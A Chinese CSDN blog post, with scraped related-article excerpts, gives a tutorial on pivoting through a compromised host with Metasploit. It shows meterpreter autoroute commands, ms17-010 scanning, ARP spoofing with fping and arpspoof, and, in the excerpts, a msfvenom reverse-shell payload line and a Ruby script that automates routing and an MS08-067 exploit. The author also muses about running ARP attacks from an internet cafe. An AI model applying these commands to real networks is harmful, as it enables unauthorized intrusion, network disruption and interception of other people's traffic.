msf 代理内网机器后,进行内网其他网段机器的渗透

最新推荐文章于 2025-04-10 11:48:42 发布
最新推荐文章于 2025-04-10 11:48:42 发布
阅读量2.9k 收藏 8
点赞数 3
分类专栏: msf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_40709439/article/details/85333036
版权

##titile :msf 代理内网机器后,进行内网其他网段机器的渗透

首先利用反弹木马返回meterpreter shell

利用这个shell 查该机器网段,及添加路由,为渗透其他的机器做准备

  • run get_local_subnets //获取路由地址
  • run autoroute -s xxx.xxx.xxx.xxx/24 //添加路由
  • run autoroute -p //查看添加的路由
    +run autorouute -d //删除添加的路由
  • background //挂载到后台运行

至此,我们成功的把路由网段给添加到msf中。backgroup让会话在后台运行,我们可以用ms17-010来扫描整个内网机子了。

在linux环境

ARP攻击的攻击原理

  • ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。

操作指令:

· fping -asg 网络号/子网掩码 # 查看内网在线主机

· arpspoof -i eth0 -t 目标IP 网关IP # ARP欺骗

  • 1.取得 win 7 上的 ip 地址 和网关地址

如:

· ip地址: 192.168.135.131

· 网关地址: 192.168.135.2

查看同一局域网内当前在线的主机情况:

fping -asg 192.168.135.0/24

在查找到网内在线的主机后,就可以选择一个作为攻击的目标了,这里以 win7 为受害主机,攻击如下:

arpspoof -i eth0 -t 192.168.135.131(攻击机ip) 192.168.135.2(网关)
这样可以让目标机器无法联网通信。

但实际情况,如果我需要在网吧使用我远程服务器进行arp攻击的话,还需要进行本地的代理,让本地代理我的远程服务器这样使我的服务器处于同个网段。不然就只能带个u盘了

内网渗透-内网代理穿透和内网横向移动
lza20001103的博客
09-23 2913
内网代理穿透和内网横向移动 文章目录内网代理穿透和内网横向移动前言内网代理穿透nctermite(ew)ssh正向代理(A,B,C)msf设置路由和sock4代理访问内网流量内网横向移动后记 前言 进入内网后,我们就要扫描内网中有哪些主机了,重点是我们外网是无法访问内网主机的,所在网段是不一样的,这时就需要我们设置代理和路由进行访问内网的流量了。上一期讲解了信息收集的相关内容,收集网段,补丁和域中成员以及域控的信息,对以下的横向移动至关重要,对后期的提权做好了准备。 内网代理穿透 首先,我们介绍几种代理
掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够了
等风来
01-10 4428
当今,网络系统面临着越来越严峻的安全挑战。在众多的安全挑战中,一种有组织、有特定目标、长时间持续的新型网络攻击日益猖獗,国际上常称之为APT(Advanced Persistent Threat,高级持续性威胁)攻击。传统的渗透测试从外网发起攻击,并以攻破单台主机为目标。与之相比,APT攻击在技术上更加系统地实现了对目标内网主机的大批量控制,从而使业内对内网渗透技术的关注度提高到了一个空前的高度。
渗透必看!MSF 下域内渗透实战
Appleteachers的博客
05-22 776
先获取域内机器session run get_local_subnets //获取本地网络子网掩码 route add 192.168.233.0 255.255.255.0 1 //添加路由表 run autoroute -s 192.168.2.0 -n 255.255.255.0 //也可以添加一条静态路由 run autoroute -s 192.168.2.0/24 //添加动态路由 route print //打印路由表 use auxliary/scanner/portscan/tcp //
内网之一次成功的内网渗透
shy的博客
10-09 1129
虚拟网卡配置 环境问题: 虚拟机桥接获取不到IP地址,通过还原默认设置,指定物理网卡解决 靶机1,内网网卡获取不到IP地址,通过添加配置文件解决。 开始渗透: Kali:192.168.1.13 Centos7:192.168.1.16 192.168.22.11 扫端口 使用nmap 顺便扫漏洞 nmap -sS -A 192.168.101.91 --script=vuln 比较慢,没有截图 访问80 测试宝塔未授权访问漏洞,不存在 查看robots...
ipv4的内网网段和划分规则
最新发布
servepeople的博客
04-10 694
这些内网网段是由互联网工程任务组(IETF)通过RFC 1918文档规定的,目的是为了让各个组织能够在内部网络中自由分配和使用IP地址,而不会与互联网上的公共IP地址发生冲突。同时,在网络地址转换(NAT)技术的支持下,这些内网中的设备可以通过路由器等设备共享一个或多个公网IP地址来访问互联网。
MSF实现远程渗透
WFC1006848997的博客
01-12 2877
MSF实现远程渗透 在本地测试腻了的小伙伴安耐不住,想耍耍远程的朋友,奈何不会msf远程渗透,服务器搭建也不会,那怎么办呢?今天笔者将分享一个让你本地的kali也能耍耍你远方的朋友,上才艺。 0x01环境准备 系统:Kali linux 工具:MSF、 Sunny-Ngrok 0x02环境部署 打开Sunny官网 (www.ngrok.cc),点击注册 完成注册登录,点击隧道管理,点击开通隧道,选择0元白嫖,当然你可以选择其他,笔者只能白嫖 可阅读,确认 隧道协议选择tcp,然后为你的隧道取个名称,选
好文转载 ONE DAY |网络安全渗透测试之跨网段攻击
AI_data_cloud的博客
05-05 1127
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。
msf 代理和转发
03-11 5563
简介 本篇文章主要是关于msf框架的实战内容,主要是关于代理,中继的内容的 网络拓扑图如下 根据网络拓扑,目标公司公网上暴露着一台服务器,然后内部还有两台服务器,但是不能出网,也无法直接访问到,防火墙对于进站规则限制严格,仅允许访问80,443端口,对于A服务器的出站不做限制。 以下的实验是基于这种前提:我们已经拿下了服务器的权限,并且成功反弹shell的情况下,将实验msf在以下三种跨网段的使用 添加路由 端口转发 反向代理 添加路由 ,适用于初始的跨网段代理 端口转发,适用于访问特定目标的代理
MSF内网渗透实战
hackzkaq的博客
05-17 4102
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
内网渗透实战技巧 PDF文件
01-02
内网渗透实战技巧的文章为我们详细讲解了在VulnStack1靶机环境下,如何进行内网渗透。VulnStack1是由红日安全团队开发的一个内网渗透靶机环境,其目的在于模拟真实的内网环境,帮助渗透测试人员练习和掌握内网渗透的...
内网渗透|内网攻防—多级代理
include_voidmain的博客
03-03 6499
0x01前言 本文讲述由公司的一次内网靶场攻防,对多级代理的建立和配置进行分享,首先介绍一下靶场。 入口是有web漏洞的linux机器,横向到一个有漏洞的winPC上(双网卡),通过双网卡ms17-010到域成员机器上,最后打域控。 这里因为篇幅原因,不说攻打靶场的全过程,直接到frp隧道的建立和连接。 攻击机(kali):172.16.222.128 入口机:192.168.10.10 winPC:192.168.10.20/ 192.168.20.10 ms17-010: 192.168.20.20/
从零开始学网安:Day3 体验跨网段渗透与后渗透经验分享
无业de小白的博客
05-07 488
这一次分享一些跨网段渗透与简单后渗透操作体验。可以当成两个独立的实验来看待。有尝试过两个合并完成,但由于winxp连接不稳定等因素,展示后渗透效果没有直接在win7上展示好。所以可以换一下实验流程,将winxp作为跳板,win7作为靶机效果更好。
MSF配置代理转发
j13373960206的博客
07-13 915
现在可以将主机1 设置成代理转发模式,也就是ms将数据包发送给主机1 ,主机1 再将数据包发送给主机2 ,以此来完成控制主机2。1、getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管 道。2、getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。此时在msf主机2之间有主机1 ,而且主机1 已经被我们所控制(成功上线)2、修改配置文件,指定使用kail中的配置的代理服务。在被入侵的主机上,执行后门后,此时会发现上线成功。
MSF多层内网渗透全过程
include_voidmain的博客
08-16 2390
MSF多层内网渗透全过程
MSF横向拓展(流量代理,端口代理转发)--详细教程
qq_41245301的博客
01-19 1226
命令进行路由跟踪发现走了我的真实机的vmnet8网卡,我们在kail中把vmnet8的网卡的网关删除掉(需要连外网时记得添加回来route add default gw 192.168.138.2),再ping时发现已经网络不可达了,实验环境就可以了。原理:因为之前环境已经实现了通过msf可以访问到内网主机的功能,我们现在通过server/socks_proxy模块实现让指定的流量走msf创建的路由到达内网主机,实现代理。可以实现代理,我们可以发现当我们使用代理时是不能连接到内网主机的,当我们加上。
kali环境下msf+proxychains构造代理通讯链实现不出网主机通讯
2302_79590880的博客
12-30 867
linux系统中利用msf配合proxychains构造内网通讯链
论后渗透MSF之 | 添加路由和代理
一醉一休的博客
09-08 7100
内网中添加路由主要是`充当跳板`功能, 其实是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的meterpreter shell的基础上`添加一条去往内网的路由`,此路由的下一跳转发,即网关,是MSF攻击平台与被攻击目标建立的一个session会话
利用MSF设置代理
Continuejww的博客
11-10 1938
通过MSF拿到一个机器的权限后,通过MSF搭建socks代理,然后通内网。拿到目标权限,有很多方法,比如:①ms17-010 ②补丁漏洞 ③MSF生成后门在此直接使用MSF生成后门MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。一般用 socks4a和socks5进行代理,socks5可以设置用户名和密码;新版本的MSF已经整合了socks代理,在模块中模块中直接设置。
Windows网络服务渗透测试实战-跨网段攻击
c_lanxiaofang的博客
05-19 6846
一、实验项目名称 Windows网络服务渗透测试实战-跨网段攻击 二、实验目的及要求 掌握对跨网段攻击的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 获取winxp系统管理员admin的密码,并使xp系统关机 ----基础配置---- 1、选择win7 2.选择winXP 3、选择kali 4、查看kali的ip 5、查看winXP的ip 6、查看win7的IP 总结如下: ...
msf内网会话传递到外网
03-15
### 如何将在 Metasploit Framework 中获得的内网会话传递到外网 在渗透测试过程中,通过 Metasploit Framework 获得内网主机控制权后,通常需要将该会话转发至外部网络以便进一步操作。以下是实现这一目标的具体方法: #### 使用 `pivot` 技术 Metasploit 提供了一种称为 `pivot` 的功能,允许用户通过已经获取的 Meterpreter 会话来访问其他内部网络资源。这种技术可以通过设置动态端口转发或路由表完成。 1. **启用端口转发** 在 Meterpreter 会话中执行以下命令以创建一个动态端口转发: ```bash portfwd add -l <LPORT> -p <RPORT> -r <TARGET_IP> ``` 这里的 `<LPORT>` 是本地监听端口,`<RPORT>` 是远程目标服务的端口,而 `<TARGET_IP>` 是要连接的目标服务器地址[^5]。 2. **配置路由** 如果需要扫描整个子网或者访问多个内网设备,则可以使用 `autoroute` 或手动添加路由条目: ```bash run autoroute -s <SUBNET>/<CIDR> -n <SESSION_ID> ``` 此命令会在当前会话上自动为指定的子网添加一条静态路由记录[^4]。 3. **利用已有的会话发起新攻击** 当成功设置了上述两项之后,就可以以外部机器作为跳板继续针对更深层级的目标发动新一轮攻势了。例如,如果发现了另一台位于同一局域网内的易受攻击的服务实例(比如 SMB),那么可以直接调用相应的 exploit 并指向那个新的 IP 地址即可。 #### 实现代码示例 下面给出一段简单的 Ruby 脚本片段展示如何自动化部分流程: ```ruby session_id = client.session_host # 获取当前 session id subnet = '192.168.x.y' # 替换为目标实际所在的网段范围 cidr = '/z' # CIDR 表达形式表示掩码长度 print_status("Adding route to #{subnet}#{cidr}") run_single("run autoroute -s #{subnet}#{cidr} -n #{session_id}") # 假定我们想要尝试 MS08-067 漏洞... exploit_datastore['RHOSTS'] = ['192.168.a.b'] exploit_datastore['LHOST'] ||= Rex::Socket.source_address('127.0.0.1') execute_exploit() ``` #### 注意事项 尽管这种方法非常强大且灵活,但在真实环境中实施之前务必确认拥有合法授权以及遵循当地法律法规的要求[^1]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值